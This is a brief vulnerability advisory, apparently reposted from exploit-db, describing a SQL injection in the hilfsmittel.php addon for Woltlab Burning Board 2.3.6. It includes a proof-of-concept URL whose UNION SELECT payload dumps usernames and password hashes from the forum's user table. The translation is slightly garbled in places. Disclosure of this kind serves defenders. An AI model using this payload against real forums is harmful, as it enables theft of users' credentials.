Woltlab Burning Board 2.3.6 addon SQL injection vulnerability-vulnerability warning-the black bar safety net

2011-02-23T00:00:00
ID MYHACK58:62201129525
Type myhack58
Reporter 佚名
Modified 2011-02-23T00:00:00

Description

Woltlab Burning Board is a PHP, MySQL backend support of the WEB forum program. Woltlab Burning Board 2.3.6 in the hilfsmittel. php plug-ins existSQL injectionvulnerabilities that could lead to sensitive information disclosure.

[+]info: ~~~~~~~~~ Woltlab Burning Board 2.3.6 Addon (hilfsmittel.php) SQL Injection Vulnerability [+] Autor: Crazyball [+] Vulnerabilities [ SQL Injection ] [+] Page: http://www.euweb.at/ [+] Language: [ PHP ] [+] Version: Hilfsmitteldatenbank 1.0 [+] Date: n/a [+] Vendor: http://www.woltlab.com/de/

[+]poc: ~~~~~~~~~ http://[host]/[path]/hilfsmittel. php? action=read&katid=5'//UNION//SELECT//1,2,concat(username,0x3a,password),4,5,6,7,8,9,1 0//FROM/*/bb1_users/

[+]Reference: ~~~~~~~~~ http://www.exploit-db.com/exploits/16202